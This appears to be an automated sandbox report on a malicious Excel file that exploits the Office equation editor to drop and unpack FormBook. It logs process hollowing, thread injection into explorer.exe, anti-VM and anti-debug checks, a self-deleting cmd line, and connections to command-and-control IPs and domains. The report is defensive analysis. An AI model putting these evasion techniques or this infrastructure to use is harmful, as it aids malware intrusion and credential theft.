          Source: 00000006.00000002.2220222146.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.2220222146.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: explorer.exe, 00000007.00000000.2182495093.0000000003C40000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
          Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@11/6@6/6
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$NEW 01 13 2021.xlsxJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRFC87.tmpJump to behavior
          Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: NEW 01 13 2021.xlsxVirustotal: Detection: 29%
          Source: NEW 01 13 2021.xlsxReversingLabs: Detection: 22%
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: unknownProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: unknownProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: unknownProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\chkdsk.exe C:\Windows\SysWOW64\chkdsk.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\Public\vbc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
          Source: NEW 01 13 2021.xlsxStatic file information: File size 1511936 > 1048576
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: chkdsk.pdb source: vbc.exe, 00000006.00000002.2220300365.000000000047D000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdb source: vbc.exe, chkdsk.exe
          Source: NEW 01 13 2021.xlsxInitial sample: OLE indicators vbamacros = False
          Source: NEW 01 13 2021.xlsxInitial sample: OLE indicators encrypted = True
          Source: C:\Users\Public\vbc.exeCode function: 4_2_003664FA push ebp; iretd
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0040C8B1 push ss; iretd
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0041B3F2 push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0041B3FB push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0041B3A5 push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0041B45C push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00415CB8 push esi; ret
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0041A5F2 push cs; retf
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0085DFA1 push ecx; ret
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0257DFA1 push ecx; ret
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0009B3A5 push eax; ret
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0009B3FB push eax; ret
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0009B3F2 push eax; ret
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0009B45C push eax; ret
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0009A5F2 push cs; retf
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0008C8B1 push ss; iretd
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_00095CB8 push esi; ret
          Source: initial sampleStatic PE information: section name: .text entropy: 7.22615348682
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\file2[1].exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

          Boot Survival:

          barindex
          Drops PE files to the user root directoryShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: NEW 01 13 2021.xlsxStream path 'EncryptedPackage' entropy: 7.99984749113 (max. 8.0)

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM_3Show sources
          Source: Yara matchFile source: 00000004.00000002.2175312527.00000000026B1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2812, type: MEMORY
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: vbc.exe, 00000004.00000002.2175312527.00000000026B1000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Source: vbc.exe, 00000004.00000002.2175312527.00000000026B1000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\chkdsk.exeRDTSC instruction interceptor: First address: 00000000000885E4 second address: 00000000000885EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\chkdsk.exeRDTSC instruction interceptor: First address: 000000000008896E second address: 0000000000088974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\Public\vbc.exeCode function: 6_2_004088A0 rdtsc
          Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2344Thread sleep time: -300000s >= -30000s
          Source: C:\Users\Public\vbc.exe TID: 2796Thread sleep time: -50634s >= -30000s
          Source: C:\Users\Public\vbc.exe TID: 2876Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 504Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\SysWOW64\chkdsk.exe TID: 3028Thread sleep time: -34000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\chkdsk.exeLast function: Thread delayed
          Source: explorer.exe, 00000007.00000000.2191376878.00000000082FD000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0y
          Source: explorer.exe, 00000007.00000000.2183732159.0000000004234000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: explorer.exe, 00000007.00000000.2176510697.00000000001F5000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: vbc.exe, 00000004.00000002.2175312527.00000000026B1000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: vbc.exe, 00000004.00000002.2175312527.00000000026B1000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: explorer.exe, 00000007.00000000.2183732159.0000000004234000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: explorer.exe, 00000007.00000000.2191376878.00000000082FD000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000PctiT
          Source: explorer.exe, 00000007.00000000.2183732159.0000000004234000.00000004.00000001.sdmpBinary or memory string: scsi\disk&ven_vmware&prod_virtual_disk\5&22be343f&0&000000
          Source: explorer.exe, 00000007.00000000.2183637257.00000000041AD000.00000004.00000001.sdmpBinary or memory string: ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0
          Source: vbc.exe, 00000004.00000002.2175312527.00000000026B1000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
          Source: explorer.exe, 00000007.00000002.2370693082.0000000000231000.00000004.00000020.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}
          Source: vbc.exe, 00000004.00000002.2175312527.00000000026B1000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: C:\Users\Public\vbc.exeProcess information queried: ProcessInformation
          Source: C:\Users\Public\vbc.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess queried: DebugPort
          Source: C:\Users\Public\vbc.exeCode function: 6_2_004088A0 rdtsc
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00409B10 LdrLoadDll,
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00840080 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\Public\vbc.exeCode function: 6_2_008400EA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\vbc.exeCode function: 6_2_008626F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_025826F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\vbc.exeProcess token adjusted: Debug
          Source: C:\Users\Public\vbc.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess token adjusted: Debug
          Source: C:\Users\Public\vbc.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 199.34.228.73 80
          Source: C:\Windows\explorer.exeNetwork Connect: 94.73.146.42 80
          Source: C:\Windows\explorer.exeNetwork Connect: 35.246.6.109 80
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeNetwork Connect: 54.254.26.94 80
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\Public\vbc.exeMemory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and write
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\chkdsk.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\chkdsk.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\Public\vbc.exeThread register set: target process: 1388
          Source: C:\Users\Public\vbc.exeThread register set: target process: 1388
          Source: C:\Windows\SysWOW64\chkdsk.exeThread register set: target process: 1388
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\Public\vbc.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\Public\vbc.exeSection unmapped: C:\Windows\SysWOW64\chkdsk.exe base address: 330000
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
          Source: explorer.exe, 00000007.00000002.2370890876.00000000006F0000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000007.00000002.2370890876.00000000006F0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000007.00000000.2176510697.00000000001F5000.00000004.00000020.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000007.00000002.2370890876.00000000006F0000.00000002.00000001.sdmpBinary or memory string: !Progman
          Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\Public\vbc.exe VolumeInformation
          Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000008.00000002.2370481869.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.2370639916.0000000000260000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2220114080.0000000000190000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.2370580381.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2175872234.00000000036B9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2220171178.0000000000350000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2220222146.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 6.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000008.00000002.2370481869.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.2370639916.0000000000260000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2220114080.0000000000190000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.2370580381.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2175872234.00000000036B9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2220171178.0000000000350000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2220222146.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 6.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection612Masquerading111OS Credential DumpingSecurity Software Discovery221Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsExploitation for Client Execution13Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion3LSASS MemoryVirtualization/Sandbox Evasion3Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer14Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools11Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection612NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol23SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information31Cached Domain CredentialsSystem Information Discovery113VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing2DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 339199 Sample: NEW 01 13 2021.xlsx Startdate: 13/01/2021 Architecture: WINDOWS Score: 100 54 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->54 56 Found malware configuration 2->56 58 Malicious sample detected (through community Yara rule) 2->58 60 14 other signatures 2->60 10 EQNEDT32.EXE 12 2->10         started        15 EXCEL.EXE 37 17 2->15         started        process3 dnsIp4 46 18.195.87.136, 49165, 80 AMAZON-02US United States 10->46 34 C:\Users\user\AppData\Local\...\file2[1].exe, PE32 10->34 dropped 36 C:\Users\Public\vbc.exe, PE32 10->36 dropped 72 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 10->72 17 vbc.exe 10->17         started        38 C:\Users\user\Desktop\~$NEW 01 13 2021.xlsx, data 15->38 dropped file5 signatures6 process7 signatures8 48 Machine Learning detection for dropped file 17->48 50 Tries to detect virtualization through RDTSC time measurements 17->50 52 Injects a PE file into a foreign processes 17->52 20 vbc.exe 17->20         started        23 vbc.exe 17->23         started        process9 signatures10 62 Modifies the context of a thread in another process (thread injection) 20->62 64 Maps a DLL or memory area into another process 20->64 66 Sample uses process hollowing technique 20->66 68 Queues an APC in another process (thread injection) 20->68 25 explorer.exe 20->25 injected process11 dnsIp12 40 www.acdfr.com 199.34.228.73, 49169, 80 WEEBLYUS United States 25->40 42 gdsjgf.com 34.102.136.180, 49166, 80 GOOGLEUS United States 25->42 44 12 other IPs or domains 25->44 70 System process connects to network (likely due to code injection or exploit) 25->70 29 chkdsk.exe 25->29         started        signatures13 process14 signatures15 74 Modifies the context of a thread in another process (thread injection) 29->74 76 Maps a DLL or memory area into another process 29->76 78 Tries to detect virtualization through RDTSC time measurements 29->78 32 cmd.exe 29->32         started        process16

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          NEW 01 13 2021.xlsx30%VirustotalBrowse
          NEW 01 13 2021.xlsx22%ReversingLabsDocument-Office.Trojan.Heuristic

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\Public\vbc.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\file2[1].exe100%Joe Sandbox ML

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          6.2.vbc.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          www.acdfr.com4%VirustotalBrowse
          td-balancer-euw2-6-109.wixdns.net0%VirustotalBrowse
          h2oturkiye.com5%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://cgi.search.biglobe.ne.jp/favicon.ico0%Avira URL Cloudsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
